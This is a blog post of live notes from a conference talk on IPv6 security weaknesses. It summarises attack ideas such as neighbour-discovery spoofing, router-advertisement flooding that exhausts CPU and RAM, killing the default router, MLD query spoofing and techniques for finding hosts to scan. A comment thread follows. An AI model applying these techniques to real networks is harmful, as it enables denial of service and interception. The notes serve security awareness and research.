
Recent advances in IPv6 insecurity Marc “van Hauser” Heuse
In a distant future… IPv6 will come. Maybe, hopefully never!!!
If you haven’t already realised it, IPv6 is already in your systems. The future is already here!
Providers are now finding issues getting IPv4 addresses. IPv6 addresses are coming, slowly.
The biggest provider in Germany (Deutsche Telekom) is working on an IPv6 rollout in 2011.
Typical standard subnet for IPv6 is /64
Enough addresses for anybody!
IPv6 doesn’t do broadcasts anymore, but there are multicast addresses (local only)
This all means there are issues with scanning
Complete client autoconfiguration
IPSEC built-in by default
IPv6 is a lot about visions of how things could be! Not sure if it will be everything yet.
What’s missing from the IPv6 header
- No header length
- No identification header
- No checksum (now handled by upper layers)
- No fragmentation
- No options
Every option is an extension header on its own
- Fragmentation
- Source routing
- Destination options
- IPSEC
- ….
IPv6 is much simpler than IPv4 (or at least it seems that way)
The creators are not learning from historical issues from IPv4
Many many CVE numbers

Presented in 2005
There were no tools…
So one was created… the THC IPv6 Attack Toolkit
- Neighbor Discovery
- ARP spoofing isn’t possible anymore. However ICMP6 ND spoofing does the same job
- Neighbor Solicitation
- Duplicate address detection DoS condition. Similar to DHCP exhaustion attacks
- MITM with redirects
- DHCP => Autoconfiguration
- Uses router advertisements
- Lets a user pick their own address
- Kick the default router
- Spoof RA (Router Advertisement) to reduce default gateway to 0 lifetime
- Send your own RA
- Send RA => Systems become dual stack
- Some systems are just waiting for an RA packet to enable IPv6
- These systems will then prefer IPv6
- RA Flooding
- IPv6 is designed to have multiple addresses
- But what happens when you advertise 10,000 ?
- 100% CPU
- 100% RAM
- Cisco, Windows, old Linux, …
Remote ping scans of IPv6 not possible – van Hauser (2005)
But there are options
Identify remote systems through
- Search engines / Databases
- DNS
- Common addresses
With this we can identify SOME systems…
There are a number of common host addresses based on whats been seen on the internet in testing. The most common host address is 1
Host Addresses Analysis
How are addresses assigned
Autoconfiguration
- MAC address
- Privacy option
- Fixed random
Check similar MAC addresses… same vendor, different system!
By Hand
Common names
::1, ::2, ::3 …
::service_port (e.g. ::80)
The IPv4 address
DHCP
In total we can find around 66% of systems using these methods currently… this could be increased to 70-75% with more tuning
Just by DNS brute-forcing you can find 90% of systems (using 1900 words)
Alive brute-forcing you can find 66% of systems
Combined (with use of the brain) you can find 90-95% of the systems
Multicast
Sends periodic MLD general queries
You can send a DONE message to prevent your system receiving these MLD queries (there is a confirmation however… that spoils the party)
So the attacker has to become the Query Router
Spoof the query router for the target
If your system doesn’t send MLD general queries however, the original router will resume sending
By spoofing with a specific MAC address you can send only the MLD to the router and not the target
Is anybody sniffing
A bug found in Linux in 2008
Re-discovered in IPv6 recently
Side channel attacks in IPv6! IPv6 IS a side channel
IPv6 is complex, and the more you look into it, the more complex it becomes
Finding interesting bugs that actually matter in IPv6 is easy
Join researching IPv6
Links:
- Talk synopsis –> HERE
- THC IPv6 Attack Toolkit –> HERE
- ipv6security.info
- ipv6hacking.info
Like this:
Like Loading...
Related
This artikel is full for nonsense. If you don;t understand IPv6 dont talk about it.
Well thanks for popping by, and thanks for your constructive feedback. I always love it when people are too scared to give there name when leaving posts. It makes me truely appreciate that the internet is full of useless things.
I’d like to point out these are live notes written from the IPv6 at the Deepsec conference and not something I created. It’s also not an article.
Still I’m sure if people surf over to networkconcepts.nl (89.106.161.124) they can get much better info. You are obviously the expert on all things IPv6!
Might I also suggest, if you don’t like it, move along! I write this blog and these notes for people who have respect and aren’t idiots!
Pingback: Week 47 in Review – 2010 - 博客与新闻 - Network Security - 网络安全 - 信息安全播客网